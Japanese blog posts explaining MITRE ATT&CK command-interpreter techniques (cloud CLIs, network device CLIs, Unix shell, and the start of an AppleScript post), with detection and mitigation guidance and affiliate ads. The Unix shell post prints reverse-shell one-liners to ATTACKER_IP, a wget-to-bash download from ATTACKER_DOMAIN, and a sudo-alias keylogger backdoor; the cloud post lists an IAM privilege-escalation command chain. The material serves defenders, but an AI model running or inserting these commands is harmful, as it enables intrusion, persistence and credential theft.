AWS CLI、Azure CLI、GCloud CLIなどのクラウド管理コマンドは、クラウドインフラを効率的に運用するために欠かせないツールです。しかし、これらの正規ツールが攻撃者に悪用されると、IAMロールの権限で任意のクラウドリソースを操作され、データ漏洩やインフラ破壊に直結します。本記事ではMITRE ATT&CK T1059.009「Cloud Administration Command」の定義、具体的な攻撃シナリオ、検知方法、そして実践的な防御策を、セキュリティ担当者・クラウドエンジニア向けに詳しく解説します。

T1059.009 Cloud Administration Commandとは

MITRE ATT&CK T1059.009は、攻撃者がクラウドプロバイダ提供の管理コマンドやCLIツールを利用して悪意ある操作を行う手法です。MITRE ATT&CK公式のT1059.009ページでは、親テクニックT1059 Command and Scripting Interpreterのサブテクニックとして分類されています。

従来のT1059.001 PowerShellやBashなどはOS上のコマンドインタプリタが対象でしたが、T1059.009はクラウドネイティブな管理インターフェースに焦点を当てています。対象となるのはAWS CLI、Azure CLI、Azure PowerShell、Google Cloud SDK（gcloud）、AWS CloudShellなどです。

なぜ攻撃者はクラウド管理コマンドを悪用するのか

クラウド管理コマンドが攻撃者にとって魅力的な理由は以下の3点です。

正規ツールであるため検知が困難

AWS CLIやAzure CLIは運用チームが日常的に使用するツールです。攻撃者がこれらを使うと、正規の運用操作と悪意ある操作の区別が非常に困難になります。これは「Living off the Land（環境寄生型攻撃）」のクラウド版と言えます。

強力な権限へのアクセス

クラウドCLIはIAMロールやサービスプリンシパルに紐づいた権限で動作します。過剰な権限が付与されたIAMロールが漏洩した場合、攻撃者はS3バケットの全データダウンロード、EC2インスタンスの起動・停止、IAMポリシーの変更など、広範な操作を実行できます。

マルウェア不要で攻撃が完結

クラウドCLIはAPIを直接呼び出すため、マルウェアのインストールが不要です。認証情報（アクセスキーやトークン）さえ入手すれば、攻撃者のローカル環境から直接クラウドリソースを操作できてしまいます。

AWS CloudShellの悪用シナリオ

AWS CloudShellはAWSマネジメントコンソールからブラウザ上で直接CLIを実行できるサービスです。攻撃者がAWSコンソールへのアクセス権を得た場合、以下のような悪用が可能になります。

シナリオ1：コンソールセッションハイジャック

フィッシングや認証情報の窃取によりAWSコンソールにログインした攻撃者は、CloudShellを起動して追加のツールインストールなしに即座にAWS CLIコマンドを実行できます。CloudShellはセッションユーザーのIAM権限を自動的に引き継ぐため、権限設定によっては甚大な被害を引き起こします。

シナリオ2：永続化のためのバックドア作成

CloudShellからaws iam create-access-keyコマンドで新しいアクセスキーを生成し、外部に送信するケースがあります。また、aws lambda create-functionでバックドア用のLambda関数をデプロイするなど、永続的なアクセス手段を確保する手法も報告されています。

IAMロール悪用との組み合わせ

T1059.009は単独で使用されることもありますが、IAMロールの悪用と組み合わさることで被害が拡大します。

権限昇格チェーン

攻撃者は初期アクセスで得た限定的な権限から、以下のようなステップで権限を昇格させます。

1. 漏洩したアクセスキーでaws sts get-caller-identityを実行し、現在の権限を確認
2. aws iam list-attached-user-policiesでポリシーを列挙
3. aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccessで管理者権限を付与
4. 管理者権限で任意のリソースを操作

クロスアカウントロールの悪用

Azure環境ではaz account listでアクセス可能なサブスクリプションを列挙し、az role assignment createで他のサブスクリプションへの権限を取得するケースがあります。GCP環境でもgcloud projects listとgcloud projects add-iam-policy-bindingの組み合わせで同様の横展開が可能です。

実際の攻撃事例

クラウド管理コマンドを悪用する脅威アクターの活動が複数報告されています。

TeamTNTによるクラウドリソースの不正利用

TeamTNTはクラウド環境を標的としたクリプトマイニンググループです。AWSのメタデータサービス（169.254.169.254）から認証情報を窃取し、AWS CLIを使ってEC2インスタンスの大量起動やS3バケットへのアクセスを行います。

ScarletEelによるAWS環境への侵入

ScarletEelは、Kubernetes環境への初期侵入後にAWS CLIを使って認証情報を列挙し、クロスアカウントでのラテラルムーブメントを行ったことが報告されています。aws sts assume-roleを使い、複数のAWSアカウントを横断して暗号資産マイニングインフラを構築しました。

LUCR-3（Scattered Spider）によるSaaS・クラウド攻撃

LUCR-3はソーシャルエンジニアリングでIDP（Identity Provider）への初期アクセスを取得し、Azure CLIやAWS CLIを使ってクラウドリソースを操作することで知られています。特にAzure ADの設定変更やAWSのOrganizations操作を通じた大規模な情報窃取が確認されています。

検知方法

クラウド管理コマンドの悪用を検知するには、各クラウドプロバイダの監査ログを活用します。

AWS CloudTrailによる検知

AWS CloudTrailはすべてのAPI呼び出しを記録します。以下のイベントを監視することで不審な操作を検知できます。

• CreateAccessKey：新しいアクセスキーの生成（バックドア作成の兆候）
• AssumeRole：ロールの引き受け（権限昇格・ラテラルムーブメント）
• ConsoleLogin + CloudShell起動：通常と異なるIPアドレスからのログイン後のCloudShell使用
• PutBucketPolicy：S3バケットポリシーの変更（データ流出の準備）

Azure Monitorによる検知

Azure Activity LogとMicrosoft Entra ID（旧Azure AD）のサインインログを組み合わせて監視します。az role assignment createの実行、通常と異なるIPアドレスからのAzure CLI認証、サービスプリンシパルの新規作成などが重要な検知ポイントです。

GCP Audit Logsによる検知

GCP Cloud Audit Logsでは、Admin Activity ログとData Access ログを有効にし、SetIamPolicyの呼び出し、新規サービスアカウントキーの作成、通常と異なるリージョンからのAPI呼び出しを監視します。

共通の検知ルール

どのクラウドプロバイダでも有効な検知アプローチとして、以下のルールを設定することを推奨します。

• 通常の運用時間外（深夜・休日）のCLI操作のアラート
• 新しいIPアドレスやユーザーエージェントからのAPI呼び出し
• 短時間での大量API呼び出し（偵察活動の兆候）
• IAM関連操作（権限変更・キー作成）の即時アラート

緩和策と防御のベストプラクティス

最小権限のIAMポリシー設計

IAMポリシーは最小権限の原則（Principle of Least Privilege）に基づいて設計します。*ワイルドカードの使用を避け、必要なリソースとアクションのみを許可するポリシーを作成してください。AWSではIAM Access Analyzerを使って実際のアクセスパターンからポリシーを生成できます。

条件付きアクセスポリシーの適用

Azure Conditional Access PolicyやAWS IAM Conditionを使い、信頼できるIPアドレス、デバイス、時間帯のみからCLI操作を許可します。特にMFA（多要素認証）の強制は基本中の基本です。

CloudShellの利用制限

AWS CloudShellは便利ですが、攻撃者にも同様に便利です。IAMポリシーでcloudshell:*の権限を制限するか、AWS Organizations SCP（Service Control Policy）でCloudShellの利用を特定のアカウントや役割に限定することを検討してください。

認証情報の管理強化

長期的なアクセスキーの使用を避け、一時的な認証情報（STS）を使用します。アクセスキーは定期的にローテーションし、不要なキーは即座に無効化してください。JPCERT/CCも、クラウド認証情報の管理について継続的に注意喚起を行っています。

おすすめセキュリティ対策ツール

本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。

🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入
クラウド環境の保護と併せて、管理端末のエンドポイントセキュリティも重要です。信頼性の高いセキュリティソフトの導入を強くお勧めします。

• ESET（イーセット） — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト ※PR
• ウイルスバスター — 日本語サポートが充実。国産ソフトで中小企業導入実績多数 ※PR
• Norton（ノートン） — 世界最大手のセキュリティベンダー。VPN機能も含む総合対策 ※PR

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ：クラウド管理コマンドの悪用を防ぐために

• T1059.009はAWS CLI・Azure CLI・GCloud CLIなど正規のクラウド管理ツールを悪用する攻撃手法であり、正規操作との区別が困難なため検知難易度が高い
• CloudShellの悪用やIAMロールとの組み合わせにより、権限昇格・ラテラルムーブメント・データ窃取に発展する
• CloudTrail・Azure Monitor・GCP Audit Logsでの監査ログ監視と、通常パターンからの逸脱検知が最も有効な対策
• 最小権限のIAMポリシー設計、条件付きアクセスポリシー、CloudShellの利用制限を組み合わせた多層防御が不可欠
• 認証情報（アクセスキー）の管理強化と定期ローテーションを徹底し、攻撃の起点となる認証情報漏洩リスクを低減する

クラウド環境のセキュリティは、従来のオンプレミスとは異なるアプローチが必要です。正規ツールが攻撃に使われるからこそ、ログの監視と権限管理が最大の防御線となります。自社のクラウド環境のIAM設定を今すぐ見直してみてください。

本記事はMITRE ATT&CK® v16に基づいています。© The MITRE Corporation. Licensed under Apache License 2.0.
※本サイトはMITRE非公式の解説サイトです

参考資料： MITRE ATT&CK T1059.009 – Cloud Administration Command / 情報セキュリティ10大脅威 2026（IPA） / JPCERT/CC / 内閣サイバーセキュリティセンター（NISC）

Based on MITRE ATT&CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.
本ページは非公式翻訳・解説です。正確な情報はMITRE公式サイトをご参照ください。

The post T1059.009 クラウド管理コマンドを悪用した攻撃手法と検知方法【MITRE ATT&CK】 appeared first on AI Security Review.

ネットワーク機器のCLI（コマンドラインインターフェース）は、ルーターやスイッチの管理に欠かせない強力なツールです。しかし近年、攻撃者がCisco IOS、JunOS、NX-OSなどのネットワーク機器CLIを悪用し、組織のネットワークインフラを侵害する事例が増加しています。MITRE ATT&CKフレームワークではこの手法をT1059.008「Network Device CLI」として分類しています。本記事では、ネットワーク機器CLIを悪用した攻撃の仕組み、実際の攻撃グループによる事例、検知方法、そして効果的な防御策まで、セキュリティ担当者が知るべきポイントを網羅的に解説します。

T1059.008 Network Device CLIとは

MITRE ATT&CKにおけるT1059.008は、攻撃者がネットワーク機器に備わるCLI（コマンドラインインターフェース）を悪用して不正な操作を行う攻撃手法です。T1059「Command and Scripting Interpreter」のサブテクニックとして位置づけられています。

ネットワーク機器には、ルーター、スイッチ、ファイアウォールなどが含まれ、それぞれ独自のCLI環境を持っています。代表的なものにCisco IOSのCLI、Juniper JunOS CLI、Arista EOS CLIなどがあります。攻撃者はこれらのCLIにアクセスすることで、ネットワーク設定の変更、トラフィックの傍受、バックドアの設置、さらにはファームウェアの改ざんまで行うことが可能です。

この攻撃手法が特に危険なのは、ネットワーク機器がセキュリティ監視の盲点になりやすい点にあります。多くの組織ではエンドポイントやサーバーの監視に注力する一方、ネットワーク機器のセキュリティ監視は手薄になりがちです。

攻撃者がネットワーク機器CLIを狙う理由

ネットワークの中枢を掌握できる

ルーターやスイッチはネットワークトラフィックの中継点です。これらの機器を制御することで、攻撃者は通過するすべてのトラフィックを傍受・改ざんする能力を得ます。ACL（アクセス制御リスト）の変更によるファイアウォールルールの無効化、ルーティングテーブルの書き換えによるトラフィックのリダイレクト、GREトンネルやVPN設定を利用したデータの外部送信など、ネットワークレベルでの攻撃が可能になります。

セキュリティ製品の監視対象外

EDR（Endpoint Detection and Response）やアンチウイルスソフトはネットワーク機器上では動作しません。従来のセキュリティ対策ではネットワーク機器内部の不正な操作を検知することが困難です。攻撃者はこの監視の隙間を利用して、長期間にわたる持続的なアクセスを維持します。

認証情報の取得が容易

多くの組織では、ネットワーク機器にデフォルトの認証情報や脆弱なパスワードが使用されています。また、SSH鍵の管理が不十分であったり、TACACS+やRADIUSなどの認証サーバーとの連携が適切に構成されていないケースも少なくありません。攻撃者は初期アクセスで取得した認証情報を流用して、ネットワーク機器へのアクセスを獲得します。

ネットワーク機器CLI上でのTCLスクリプト悪用

Cisco IOSには、TCL（Tool Command Language）スクリプトを実行する機能が搭載されています。攻撃者はこの機能を悪用して、ネットワーク機器上で自動化された不正操作を実行します。

具体的な悪用例として以下が挙げられます：

• 設定情報の外部送信：TCLスクリプトでルーターの設定ファイル（running-config）を取得し、TFTPやHTTPで外部サーバーに送信
• バックドアアカウントの作成：管理者権限を持つ隠しアカウントをスクリプトで自動作成
• ネットワークスキャン：TCLのソケット機能を利用して、内部ネットワークのスキャンを実行
• Syslog操作：ログの改ざんや削除により、攻撃の痕跡を消去

TCLスクリプトの悪用は、「tclsh」コマンドでインタラクティブモードに入ることで実行されます。Cisco IOSのバージョンによっては、権限レベル15（特権EXECモード）でなくても一部のTCL機能にアクセスできる場合があるため、権限管理の徹底が重要です。

実際の攻撃グループによる事例

SYNful Knock（2015年）

2015年にFireEye（現Mandiant）が発見した「SYNful Knock」は、Cisco IOSルーターのファームウェアを改ざんするインプラント攻撃です。攻撃者はルーターのCLIアクセスを得た後、正規のIOSイメージを改ざんされたものに置き換えました。この改ざんされたファームウェアは再起動後も残存し、攻撃者に持続的なバックドアアクセスを提供しました。最大14カ国で被害が確認され、ネットワーク機器を標的とした攻撃の深刻さを世界に示しました。

APT33 / Elfin

イラン系の攻撃グループAPT33（別名Elfin）は、中東やエネルギー分野の組織を標的にした攻撃キャンペーンにおいて、ネットワーク機器の脆弱性を積極的に悪用することが知られています。標的組織のネットワーク機器にアクセスし、ネットワーク設定を変更することでデータ傍受や横展開を行います。

Turla

ロシア系のAPTグループTurlaは、ネットワークインフラストラクチャを標的とした高度な攻撃で知られています。ネットワーク機器を踏み台として利用し、標的組織の内部ネットワークへの持続的なアクセスを維持する手法を用いています。特にISP（インターネットサービスプロバイダ）レベルのネットワーク機器を侵害することで、広範囲の通信傍受を可能にしていました。

検知方法

ネットワーク機器CLIの不正使用を検知するためには、複数のアプローチを組み合わせることが重要です。

Syslogによるログ監視

ネットワーク機器のSyslogを外部のSyslogサーバーに転送し、リアルタイムで監視します。特に注目すべきログイベントは以下の通りです：

• 設定変更イベント（%SYS-5-CONFIG_I）
• ログイン試行の失敗（%SEC_LOGIN-5-LOGIN_SUCCESS, %SEC_LOGIN-4-LOGIN_FAILED）
• 特権モードへの昇格（%SYS-5-PRIV_AUTH_PASS）
• ファイル操作イベント（コピー、削除など）

TACACS+によるコマンドアカウンティング

TACACS+サーバーを導入し、コマンドアカウンティングを有効にすることで、ネットワーク機器上で実行されたすべてのコマンドを記録できます。「show running-config」「copy」「tclsh」など、機密性の高いコマンドの実行を監視し、不審なコマンド実行パターンを検知します。

NetFlowによるトラフィック分析

NetFlowデータを分析することで、ネットワーク機器から外部への不審な通信を検知できます。特に、管理用ネットワーク以外からのSSH/Telnet接続や、機器から外部へのTFTP/HTTP通信は要注意です。

SNMPトラップとファームウェア整合性検証

SNMP（Simple Network Management Protocol）トラップを設定し、設定変更やインターフェース状態の変化をリアルタイムで通知します。また、定期的にファームウェアのハッシュ値を検証し、不正な改ざんがないか確認することも重要です。Ciscoの場合は「verify /md5」コマンドでIOSイメージの整合性を確認できます。

緩和策・防御方法

AAA（認証・認可・アカウンティング）の徹底

ネットワーク機器へのアクセスには、TACACS+またはRADIUSを用いた集中管理型の認証基盤を導入します。ローカルアカウントの使用を最小限にし、多要素認証（MFA）の導入も検討してください。ロールベースアクセス制御（RBAC）により、各管理者に必要最小限の権限のみを付与します。

ファームウェア整合性の確保

ネットワーク機器のファームウェアは、メーカー公式サイトから取得したものを使用し、インストール前にハッシュ値を検証します。Cisco Secure Boot、Juniper Secure Bootなどのセキュアブート機能を有効にし、不正なファームウェアの読み込みを防止します。定期的なファームウェアアップデートにより既知の脆弱性を解消することも重要です。

ネットワークセグメンテーション

管理用ネットワーク（Out-of-Band Management）を分離し、ネットワーク機器への管理アクセスは専用の管理セグメントからのみ許可します。VTY回線にACLを適用し、許可されたIPアドレスからのみSSH接続を受け付けるようにします。Telnetの使用は完全に廃止し、SSHのみに統一してください。

構成管理とバージョン管理

RANCID、Oxidized、Ansible Networkなどの構成管理ツールを導入し、ネットワーク機器の設定をバージョン管理します。定期的に設定のバックアップを取得し、承認されていない変更が行われた場合にアラートを発報する仕組みを構築しましょう。構成のドリフト（意図しない変更）を自動検出する体制が理想的です。

おすすめセキュリティ対策ツール

本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。

🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入
ネットワーク機器への攻撃と併せて、エンドポイントの防御も重要です。信頼性の高いセキュリティソフトの導入を強くお勧めします。

• ESET（イーセット） — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト ※PR
• ウイルスバスター — 日本語サポートが充実。国産ソフトで中小企業導入実績多数 ※PR
• Norton（ノートン） — 世界最大手のセキュリティベンダー。VPN機能も含む総合対策 ※PR

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ

MITRE ATT&CK T1059.008「Network Device CLI」は、ネットワーク機器のCLIを悪用した攻撃手法です。本記事のポイントを整理します。

• ネットワーク機器は監視の盲点になりやすい：EDRやアンチウイルスが動作しないため、攻撃者にとって魅力的な標的です
• TCLスクリプトなどの正規機能が悪用される：正規のCLI機能を利用するため、通常のマルウェア検知では発見できません
• APT33やTurlaなどの国家支援型グループが活用：高度な攻撃グループがネットワーク機器を標的としています
• 検知にはSyslog・TACACS+・NetFlowの組み合わせが有効：単一の検知手段では不十分であり、多層的な監視が必要です
• AAA・ファームウェア整合性・セグメンテーションで防御：基本的なセキュリティ対策の徹底が最も効果的な防御策です

ネットワーク機器のセキュリティは、組織のネットワーク全体の安全性を左右します。本記事の内容を参考に、自組織のネットワーク機器のセキュリティ体制を見直してみてください。

参考リンク

• MITRE ATT&CK T1059.008 – Network Device CLI
• IPA 独立行政法人 情報処理推進機構 セキュリティセンター
• JPCERT/CC（一般社団法人JPCERTコーディネーションセンター）
• Cisco IOS Software Integrity Assurance
• 内閣サイバーセキュリティセンター（NISC）

Based on MITRE ATT&CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.

※本サイトはMITRE非公式の解説サイトです

The post T1059.008 ネットワーク機器CLI（Network Device CLI）を悪用した攻撃手法と検知方法【MITRE ATT&CK】 appeared first on AI Security Review.

MITRE ATT&CK T1059.004「Unix Shell」は、攻撃者がLinuxやmacOS環境で標準搭載されているbash・sh・zshなどのUnixシェルを悪用して不正なコマンドを実行する攻撃手法です。Unixシェルはほぼすべてのサーバーやワークステーションにプリインストールされており、管理者が日常的に使うツールであるため、攻撃の痕跡が正規の操作に紛れやすいという特徴があります。本記事では、T1059.004の定義から具体的な攻撃手法、実際のAPTグループによる悪用事例、そして検知・防御方法まで包括的に解説します。

T1059.004 Unix Shellとは？（MITRE ATT&CK定義）

MITRE ATT&CKフレームワークにおけるT1059.004は、T1059 Command and Scripting Interpreterのサブテクニックの一つです。攻撃者がUnixシェル（bash、sh、zsh、csh、tcshなど）を利用して、ターゲットシステム上でコマンドやスクリプトを実行する手法を指します。

Unixシェルは、Linux・macOS・BSD系OSに標準搭載されるコマンドラインインタプリタであり、ファイル操作、プロセス管理、ネットワーク通信など、OSのほぼすべての機能にアクセスできます。攻撃者はこの強力な機能を悪用し、初期侵入後のペイロード実行から永続化、データ窃取まで多様な目的に利用します。

MITRE ATT&CKの公式定義は、MITRE ATT&CK T1059.004 Unix Shellをご参照ください。

攻撃者がUnix Shellを悪用する理由

あらゆるシステムに標準搭載されている

bashやshは、Linuxディストリビューション・macOS・コンテナイメージなどほぼすべてのUnix系環境に標準でインストールされています。攻撃者は追加のツールをダウンロードすることなく、侵入直後からシェルを利用して偵察やラテラルムーブメントを実行できます。

強力なスクリプティング機能

シェルスクリプトは、変数・条件分岐・ループ・関数・パイプラインなど高度なプログラミング機能を備えています。攻撃者はこれらを組み合わせて、システム偵察スクリプト、データ収集ツール、自動化されたエクスプロイトチェーンを容易に構築できます。

正規の管理操作との区別が困難

システム管理者が日常的にシェルを使用するため、攻撃者のシェル操作が正規の管理操作に紛れやすくなります。単純なログ監視だけでは、悪意のあるコマンド実行と正常な管理操作を区別することが難しいのが現状です。

バックドアと永続化が容易

シェルスクリプトをcrontabや.bashrc、systemdサービスに仕込むことで、攻撃者はシステム再起動後も持続するバックドアを簡単に設置できます。これらの設定ファイルは管理者が頻繁に確認するものではないため、長期間検知されないリスクがあります。

シェルスクリプトによるバックドア・永続化の手法

crontabを利用した永続化

攻撃者はcrontabにリバースシェルを登録し、定期的にC2サーバーへの接続を試みます。以下は典型的な手法です：

# 攻撃者がcrontabに仕込むリバースシェルの例
*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'

# 別の手法：wgetでスクリプトをダウンロードして実行
*/10 * * * * wget -q -O- http://ATTACKER_DOMAIN/payload.sh | bash

このようなcrontabエントリは、crontab -lで確認できますが、各ユーザーのcrontabを定期的に監査していなければ見逃される可能性があります。

.bashrc / .profileを利用した永続化

攻撃者はユーザーのシェル初期化ファイル（.bashrc、.bash_profile、.profile、.zshrc）に悪意のあるコードを追記します。ユーザーがログインするたびにバックドアコードが自動実行されます。

# .bashrcに追記されるバックドアの例
export PATH="/tmp/.hidden_bin:$PATH"
# 一見無害なエイリアスに偽装
alias sudo='function _sudo(){ /tmp/.keylogger "$@"; command sudo "$@"; };_sudo'

リバースシェルの手法

Unixシェルを利用した代表的なリバースシェル手法は多数存在します：

# bashによるリバースシェル
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1

# パイプを使ったリバースシェル
mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_IP PORT > /tmp/f

# Pythonを経由したシェル起動（T1059.006との組み合わせ）
python3 -c 'import os; os.system("/bin/bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1\"")'

Python経由のシェル起動については、T1059.006 Pythonを悪用した攻撃手法と検知方法もあわせてご覧ください。

実際の攻撃グループによるUnix Shell悪用事例

複数のAPTグループがUnixシェルを攻撃ツールチェーンの中核として利用しています。

APT32（OceanLotus）

ベトナムに関連するとされるAPT32は、Linuxサーバーへの侵入後にbashスクリプトを利用してバックドアの設置やデータ収集を実行することが確認されています。シェルスクリプトでシステム情報を収集し、C2サーバーへ送信する手法が報告されています。

TeamTNT

クラウド環境を標的とするTeamTNTは、bashスクリプトを多用してDockerコンテナやKubernetes環境に侵入します。クリプトマイナーの設置、SSHキーの窃取、ラテラルムーブメントのすべてをシェルスクリプトで自動化していることが特徴です。

Rocke Group

クリプトジャッキングで知られるRocke Groupは、bashスクリプトを使用してセキュリティソフトの無効化、競合するマイナーの停止、自身のマイナーのインストールを一連のスクリプトで実行します。crontabを利用した永続化も確認されています。

Lazarus Group

北朝鮮に関連するLazarus Groupは、LinuxおよびmacOS環境でシェルスクリプトを使用した攻撃を展開しています。初期侵入後のペイロードダウンロードやシステム偵察にbashコマンドを使用する事例が複数報告されています。

Unix Shell攻撃の検知方法

auditdによるコマンド実行監視

Linuxのauditdフレームワークは、execveシステムコールを監視することで、すべてのコマンド実行を記録できます。

# /etc/audit/audit.rules に追加
-a always,exit -F arch=b64 -S execve -k shell_exec
-a always,exit -F arch=b32 -S execve -k shell_exec

# bash実行の監視
-w /bin/bash -p x -k bash_execution
-w /bin/sh -p x -k sh_execution
-w /bin/zsh -p x -k zsh_execution

auditdのログは/var/log/audit/audit.logに出力され、ausearchコマンドで検索可能です。SIEM（Security Information and Event Management）と連携することで、異常なシェル実行パターンをリアルタイムに検知できます。

Syslog・bash履歴の監視

bashの履歴機能を強化することで、攻撃者のコマンド操作を記録・追跡できます。

# /etc/profile.d/bash_audit.sh に設定
export HISTTIMEFORMAT="%F %T "
export HISTSIZE=100000
export HISTFILESIZE=100000
shopt -s histappend
export PROMPT_COMMAND='history -a; logger -t bash -p auth.info "user=$(whoami) cmd=$(history 1)"'

上記の設定により、すべてのbashコマンドがsyslogに転送され、集中ログ管理サーバーで監視できるようになります。ただし、攻撃者がunset HISTFILEやHISTSIZE=0を実行して履歴を無効化する可能性があるため、auditdとの併用が推奨されます。

EDR（Endpoint Detection and Response）の活用

Linux対応のEDR製品は、プロセスの親子関係やコマンドライン引数を分析し、不審なシェル実行を検知します。特に以下のパターンは高い確度で攻撃を示唆します：

• Webサーバープロセス（apache、nginx）からのシェル起動
• /dev/tcp/を含むbashコマンドの実行
• base64デコード後のシェル実行（echo ... | base64 -d | bash）
• 一時ディレクトリ（/tmp、/dev/shm）からのスクリプト実行
• 通常と異なるユーザーアカウントからのシェル起動

Unix Shell攻撃への緩和策

制限付きシェル（Restricted Shell）の導入

rbash（restricted bash）を利用することで、ユーザーが実行できるコマンドやアクセスできるディレクトリを制限できます。サービスアカウントには必要最小限の権限のシェルを割り当てることが重要です。シェルが不要なアカウントには/sbin/nologinや/bin/falseを設定しましょう。

AppArmor / SELinuxによるアクセス制御

MAC（Mandatory Access Control）フレームワークを活用することで、プロセスがアクセスできるファイルやネットワーク接続を厳密に制御できます。Webサーバーやアプリケーションサーバーのプロファイルを適切に設定し、不要なシェル起動を防止することが効果的です。

# AppArmorプロファイルの例（Webサーバーからのシェル実行を禁止）
/usr/sbin/nginx {
  # シェルの実行を拒否
  deny /bin/bash rx,
  deny /bin/sh rx,
  deny /bin/dash rx,
  deny /bin/zsh rx,
}

スクリプトのホワイトリスト化

fapolicyd（File Access Policy Daemon）やIMA（Integrity Measurement Architecture）を利用して、承認済みのスクリプトのみ実行を許可する仕組みを構築できます。信頼されたスクリプトにのみ実行権限を付与し、未知のスクリプトの実行を検知・ブロックすることで、攻撃者が持ち込んだスクリプトの実行を防止します。

ネットワークレベルの対策

リバースシェルの多くはアウトバウンド接続を利用するため、egress（出口）フィルタリングが有効です。サーバーからのアウトバウンド接続を必要最小限のIPアドレス・ポートに制限することで、リバースシェルの確立を防止できます。

関連するATT&CKテクニック

Unix Shell攻撃は、他のATT&CKテクニックと組み合わせて使用されることが多いです。関連テクニックも理解しておきましょう。

• T1059 Command and Scripting Interpreter（親テクニック）
• T1059.001 PowerShell — Windows環境での同等の攻撃手法
• T1059.006 Python — Python経由でシェルを起動する手法との連携

おすすめセキュリティ対策ツール

本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。

🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入
Unix Shellを悪用したLinux/macOS攻撃を検知するために、信頼性の高いセキュリティソフトの導入を強くお勧めします。

• ESET（イーセット） — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト ※PR
• ウイルスバスター — 日本語サポートが充実。国産ソフトで中小企業導入実績多数 ※PR
• Norton（ノートン） — 世界最大手のセキュリティベンダー。VPN機能も含む総合対策 ※PR

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ

T1059.004 Unix Shellは、Linux/macOS環境における最も基本的かつ広く悪用される攻撃手法の一つです。以下のポイントを押さえて対策を進めましょう。

• bashやshはほぼすべてのUnix系OSに搭載されており、攻撃者は追加ツールなしでコマンド実行が可能
• crontab・.bashrc・systemdを利用した永続化が容易であり、定期的な監査が不可欠
• auditdによるexecve監視とbash履歴のsyslog転送を組み合わせた多層的な検知が有効
• AppArmor/SELinuxによるMACでWebサーバー等からのシェル起動を制限し、攻撃面を縮小
• egress フィルタリングでリバースシェルの確立を防止し、侵害の拡大を阻止

Based on MITRE ATT&CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.

※本サイトはMITRE非公式の解説サイトです

参考リンク

• MITRE ATT&CK T1059.004 Unix Shell
• IPA 情報セキュリティ
• JPCERT/CC
• 内閣サイバーセキュリティセンター（NISC）

Based on MITRE ATT&CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.
本ページは非公式翻訳・解説です。正確な情報はMITRE公式サイトをご参照ください。

The post T1059.004 Unix Shell（bash/sh）を悪用した攻撃手法と検知方法【MITRE ATT&CK】 appeared first on AI Security Review.

AppleScriptはmacOSに標準搭載されているスクリプト言語で、アプリケーション間のIPC（プロセス間通信）を通じてシステム操作を自動化できる強力な機能を持っています。しかし、この便利な機能は攻撃者にとっても格好のツールとなっています。MITRE ATT&CKフレームワークではT1059.002として分類されるAppleScriptの悪用は、macOS環境を狙う高度な攻撃グループによって実際に利用されています。本記事では、AppleScriptを悪用した攻撃手法の仕組み、実際のAPT事例、そして効果的な検知・緩和策を詳しく解説します。

Based on MITRE ATT&CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.
※本サイトはMITRE非公式の解説サイトです。公式情報はMITRE ATT&CK公式サイトをご確認ください。

T1059.002 AppleScriptとは？MITRE ATT&CKの定義

MITRE ATT&CKにおけるT1059.002は、「Command and Scripting Interpreter: AppleScript」として定義される攻撃テクニックです。これはT1059 コマンドおよびスクリプトインタプリタのサブテクニックの一つで、攻撃者がmacOS環境でAppleScriptを利用してコマンドを実行する手法を指します。

AppleScriptはmacOS（旧Mac OS X）に標準搭載されているスクリプト言語であり、OSが提供するApple Eventsという仕組みを利用してアプリケーション間通信を実現します。攻撃者はosascriptコマンドラインユーティリティを通じて、あるいはスクリプトファイルを直接実行して悪意のあるコードを実行できます。

ATT&CKにおける位置づけ

• 戦術（Tactic）：Execution（実行）
• テクニック：T1059 Command and Scripting Interpreter
• サブテクニック：T1059.002 AppleScript
• プラットフォーム：macOS
• 関連サブテクニック：T1059.001 PowerShell、T1059.005 Visual Basic

攻撃者がAppleScriptを悪用する理由

AppleScriptが攻撃者にとって魅力的なツールとなる理由は複数あります。macOS環境に標準で搭載されている正規ツールであるため、いわゆる「Living off the Land（環境寄生型）」攻撃が可能です。

osascriptコマンドの悪用

osascriptはmacOSのコマンドラインからAppleScriptを実行するためのユーティリティです。攻撃者はこのコマンドを使って以下のような操作を実行できます。

• シェルコマンドの実行：do shell script命令を使い、任意のUNIXコマンドを実行
• ファイル操作：ファイルの作成・削除・移動・コピーを自動化
• ネットワーク通信：curl等のコマンドをラップしてC2サーバーと通信
• GUI操作の自動化：System Eventsを利用したキーストローク送信やメニュー操作

IPC（プロセス間通信）機能の悪用

AppleScriptの最大の特徴は、Apple Eventsを通じた他アプリケーションとのIPC機能です。この機能を悪用することで以下が可能になります。

• メールアプリの操作：Mail.appを制御して機密メールの転送や添付ファイルの抽出
• ブラウザの操作：Safariのタブ操作やURLアクセス、Cookie情報の取得
• Finderの操作：ファイルシステムの探索やネットワーク共有へのアクセス
• キーチェーンへのアクセス：資格情報の窃取を試みる操作

実際の攻撃事例：APTグループによるAppleScript悪用

AppleScriptの悪用は理論上の脅威ではなく、複数の高度攻撃グループ（APT）によって実際に確認されています。

OceanLotus（APT32）

